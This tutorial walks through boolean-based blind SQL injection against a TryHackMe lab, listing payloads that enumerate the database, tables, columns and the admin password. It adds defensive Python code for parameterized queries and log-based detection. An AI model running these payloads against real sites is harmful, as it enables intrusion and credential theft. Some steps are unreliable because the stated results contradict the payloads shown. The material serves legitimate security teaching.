SQL Injection · Vulnerabilities

Boolean-based Blind SQL Injection

In boolean-based blind SQL injection, the response we get back from each injection attempt can only ever have two outcomes: true or false, yes or no, on or off, 1 or 0. That single bit tells us whether our SQL injection payload was successful. You might initially think that such a brief response cannot offer much information, but a complete database's structure and contents can be enumerated using just these two responses.

So, let's look at a sample web application to show how boolean-based blind SQL injection works. A screenshot of that application is provided below; it is a room on the TryHackMe platform.

In the screenshot above, we can see that the 'username' filter is passing 'admin' and that the response is "taken":true.

Therefore, we must first understand what the application is doing and the query it is running in the background.

So I entered a random value into the "username" filter in the screenshot above, and as you can see, it displays "SQL QUERY" and "SQL RESULT" in the lower portion of the screenshot.

So the query is

SELECT * FROM users WHERE username='admin' LIMIT 1

We can see from the two screenshots above that if I enter "admin", the output is "taken":true, and if I enter a random username that does not exist in the users table, the output is "taken":false.

When performing boolean-based SQL injection in the real world, we have to make educated guesses about the background SQL query, because it will not be shown to us.

It is shown here for understanding only.

Consequently, no query results are displayed on the web page. Everything we do in this case therefore comes down to flipping the query's result between true and false.
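To make the true/false oracle concrete, here is an added example (not the lab's code) that rebuilds the username check in Python with an in-memory SQLite database standing in for the lab's MySQL backend. The vulnerable version pastes the input into the query exactly as the lab does; the hardened version binds it as a parameter. It assumes, as the page's results suggest, that an SQL error is reported to the client as "taken":false.

```python
import sqlite3

# Constructed sample database standing in for the lab's "users" table.
# It has three columns, which is why the page's third UNION payload succeeds.
CONN = sqlite3.connect(":memory:", check_same_thread=False)
CONN.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users (username, password) VALUES ('admin', 'placeholder-pw');
""")


def vulnerable_taken(username: str) -> bool:
    """Mirrors the lab's username check: the input is pasted into the SQL text."""
    sql = f"SELECT * FROM users WHERE username='{username}' LIMIT 1"
    try:
        return CONN.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # Assumption: an SQL error (e.g. a UNION with the wrong column count)
        # is reported as "not taken". Together with the row/no-row answer this
        # leaks exactly one bit per request, which is the blind oracle.
        return False


def safe_taken(username: str) -> bool:
    """Same check with a bound parameter: the input is data, never SQL."""
    sql = "SELECT * FROM users WHERE username=? LIMIT 1"
    return CONN.execute(sql, (username,)).fetchone() is not None


if __name__ == "__main__":
    for probe in ("admin", "nobody",
                  "nobody' UNION SELECT NULL,NULL-- -",
                  "nobody' UNION SELECT NULL,NULL,NULL-- -"):
        print(f"{probe!r:45} vulnerable={vulnerable_taken(probe)} safe={safe_taken(probe)}")
```

With the parameterized query the injected text is simply compared against the username column, so the column-count probe that flips the vulnerable endpoint to true stays false.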

So let's start the enumeration.

Final goal: find the password of the admin user.

When we know nothing about the database, we follow the steps below.

Step_1 (Guess the query)

From the above, we can infer that the query selects rows from the users table where the username is "admin".

So the query will be

SELECT * FROM users WHERE username='admin'

Since we only guessed the query, we would not know about the "LIMIT 1" that is in the actual query.

Step_2 (Figure out the number of columns the query returns)

Although nothing is returned in the output, in order to use our own UNION query we must find out how many columns the parent query returns.

To count the columns, we use "UNION SELECT NULL, NULL", changing the number of NULLs until the column count matches.

If you’re interested in learning more about column enumeration, check out the blog post on union-based SQL injection.

Payloads to execute for enumeration

admin’ UNION SELECT NULL-- -

admin’ UNION SELECT NULL, NULL-- -

admin’ UNION SELECT NULL, NULL, NULL-- -

Executing the payloads above gives false for the first two but true for the third, indicating that the parent query returns three columns.

NOTE: Because we still don't know which database is being used, we end the payload with the comment "-- -". This syntax is valid for MySQL, Oracle, PostgreSQL and Microsoft SQL Server, which is why I use it in the payloads above.

Step_3 (Enumerate the database type and name)

The built-in SQL function database() returns the name of the current database for the connection. The exact name varies a little between SQL dialects, but in general it takes no arguments and in MySQL is simply called as database().

The database in use is still unknown, so the first step is to identify the database type. It could be MySQL, Microsoft SQL Server, Oracle, PostgreSQL, or another type.

So let's build the payload

admin123' UNION SELECT NULL, NULL, NULL FROM information_schema.tables WHERE table_name LIKE "%"-- -

The payload above runs on each of the databases mentioned above; if it returns true, we can conclude that the database in use is one of those listed.

Let's execute it

I ran the payload above and it returned true, so the database is one of MySQL, Microsoft SQL Server, or PostgreSQL. Oracle is ruled out because it has no information_schema.

Now count the characters in the database name.

Since the name is a string, we use length(), which returns the length of any string, to determine the length of the database name. Note that database() is a MySQL function (PostgreSQL uses current_database() and SQL Server uses DB_NAME()), so a true result here also tells us that the backend is MySQL.

Let's make the payload

admin12324' UNION SELECT 1,2,3 where length(database())=9;-- -

Here we start from 1 and increase the number until we get true, so our payloads can be

admin12324' UNION SELECT 1,2,3 where length(database())=1;--

admin12324' UNION SELECT 1,2,3 where length(database())=2;--

admin12324' UNION SELECT 1,2,3 where length(database())=3;--

admin12324' UNION SELECT 1,2,3 where length(database())=4;--

The output is true for 10, so we can state that the length is 10.

admin12324' UNION SELECT 1,2,3 where length(database())=10;--

You can also see in the below screenshot

Now we enumerate the database name itself.

Let's make a payload for the first character of the database name.

admin123' UNION SELECT 1,2,3 where database() like 'a%';-- -

Here is the explanation of the query above.

database() gives us the database name, and we compare it with the text supplied after LIKE in the payload. The query above therefore returns false, because the database name does not begin with "a".

Let's execute the payloads below, and so on

admin123' UNION SELECT 1,2,3 where database() like 'a%';-- -

admin123' UNION SELECT 1,2,3 where database() like 'b%';-- -

admin123' UNION SELECT 1,2,3 where database() like 'c%';-- -

admin123' UNION SELECT 1,2,3 where database() like 'd%';-- -

admin123' UNION SELECT 1,2,3 where database() like 'e%';-- -

And so on until we get true

Now we get true for "s", so we can state that the name begins with "s".

To find the next character, we test every possible character in the second position until we hit the right one.

admin123' UNION SELECT 1,2,3 where database() like 'sq%';-- -

Therefore, we can state that it begins with "sq".

We continue in this way until we have a name that is 10 characters long.

So the last payload, for the 10th character, is

admin123' UNION SELECT 1,2,3 where database() like 'sqli_three%';--

The database name is sqli_three, which matches the 10-character length we found earlier.

Step_4 (List the names of the tables)

Now that we have the database name, we use it to enumerate the names of the tables it contains.

Let's make the payload

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--

This payload retrieves data from the information_schema.tables table, where the table_schema column contains “sqli_three,” and the table_name column contains a string beginning with “a.” If both conditions are satisfied, the payload returns true; otherwise, it returns false.

So now we enumerate the first character

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'b%';--

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'c%';--

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'd%';--

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'e%';--

We keep changing the first character and get true for "u".

Payload for ‘u’ is below

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'u%';--

We list the entire table name in this manner. To determine the length of the table name, we can use the payload below.

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'u%' and length(table_name)=5;--

In essence, it selects a row from the information_schema.tables table where the table_schema column contains the string "sqli_three", the table_name column contains a name beginning with the letter "u", and length(table_name) calculates the length of that table name and compares it to 5.

In the screenshot above, we can see that it is giving us true for 5, allowing us to determine that the length is 5, and the name begins with “u.”

The word "users" is five characters long and begins with "u", which matches what we found. Let's check whether this guess is correct.

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users' and length(table_name)=5;--

We’ve had success here.

Having discovered the table’s name, we will now determine the names of the columns it contains.

Now, the first thing that occurs to us is that the users table may contain columns such as username, id, password, usernames, etc., so we check for those first. If nothing is found, we search for each character individually, as before.

So let's make a payload. First, let's check for the column name "username".

Admin1234' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'sqli_three' and table_name='users' and column_name='username';--

It succeeded, so username is one of the column names.

Now check for 'password'

Admin1234' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'sqli_three' and table_name='users' and column_name='password';--

It succeeded, so password is one of the column names.

So now we know that the columns we need, 'username' and 'password', exist.

Step_5 (Finding the credentials)

Now we have to find the credentials in the users table. Let's make the payload

Admin123' UNION SELECT 1,2,3 FROM users WHERE username LIKE 'a%';--

The output is true, so one of the usernames begins with an "a".

So let's try the username 'admin'. The payload would be

Admin123' UNION SELECT 1,2,3 FROM users WHERE username='admin';--

Thus, the output for the username “admin” is true.

Now let's check the password for admin. The password can contain any character, alphabetic or not, so we have to try every character, but first we find the length of the password.

Let's make the payload for finding the password length

Aadmin123' UNION SELECT 1,2,3 from users where username='admin' and length(password)=4;--

We now know that the password is four characters long. Let's now try to identify its first character.

Let's make the payload

Aadmin123' UNION SELECT 1,2,3 from users where username='admin' and password LIKE '1%';--

Let's execute it

After trying the digits in the first position, we find that the first character is 3. Since the first character is a number, we try a number in the second position too.

let’s create the payload.

Aadmin123' UNION SELECT 1,2,3 from users where username='admin' and password LIKE '31%';--

The output is true, so the second character is 8. We discover the remaining characters in the same way, and the password is 3845.

So now let's try to log in with our credentials, 'admin' and '3845'.

Now that we have successfully logged in, you can see in the screenshot above where the flag is.
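From the defender's side, every step above costs one HTTP request per guess, so the enumeration leaves a long trail in the web server log. The added example below (not part of the original post) scans constructed access-log lines for the payload shapes used on this page and flags source IPs that trip the markers repeatedly; the log format, paths, timestamps and IPs are assumed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Markers taken from the payload shapes on this page: UNION column counting,
# information_schema lookups, length() guesses and LIKE 'x%' prefix probes.
MARKERS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "info_schema": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "length_probe": re.compile(r"\blength\s*\(\s*(database\(\)|table_name|password)\s*\)\s*=", re.I),
    "like_prefix": re.compile(r"\blike\s+'[^']*%'", re.I),
}

# Constructed access-log lines (hypothetical IPs, path and timestamps) in
# common log format; the username parameter is URL-encoded as a browser sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /checkuser?username=admin HTTP/1.1" 200 15
10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /checkuser?username=admin%27%20UNION%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 200 14
10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /checkuser?username=admin123%27%20UNION%20SELECT%201%2C2%2C3%20where%20length%28database%28%29%29%3D10%3B-- HTTP/1.1" 200 14
10.0.0.9 - - [01/Jan/2024:10:00:04] "GET /checkuser?username=admin123%27%20UNION%20SELECT%201%2C2%2C3%20FROM%20information_schema.tables%20WHERE%20table_schema%3D%27sqli_three%27%20and%20table_name%20like%20%27u%25%27%3B-- HTTP/1.1" 200 14
10.0.0.7 - - [01/Jan/2024:10:00:05] "GET /checkuser?username=o%27brien HTTP/1.1" 200 15
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')

def username_param(path: str) -> str:
    """Extract and URL-decode the username query parameter (empty if absent)."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    return qs.get("username", [""])[0]

def scan(log_text: str) -> list:
    """Return (ip, decoded username value, matched marker names) per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        value = username_param(m["path"])
        matched = [name for name, pat in MARKERS.items() if pat.search(value)]
        if matched:
            hits.append((m["ip"], value, matched))
    return hits

def noisy_sources(hits: list, threshold: int = 3) -> set:
    """Blind SQLi needs one request per guess, so flag IPs with repeated marker hits."""
    return {ip for ip, n in Counter(h[0] for h in hits).items() if n >= threshold}

if __name__ == "__main__":
    for ip, value, names in scan(SAMPLE_LOG):
        print(f"{ip}  {names}  {value}")
```

A lone apostrophe (o'brien) is deliberately not a marker, so ordinary names do not trigger alerts; what stands out is the combination of SQL keywords and the request volume from one source.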

Here, I've used an excellent lab from TryHackMe to describe boolean-based blind SQL injection. The link is below.

https://tryhackme.com/room/sqlinjectionlm
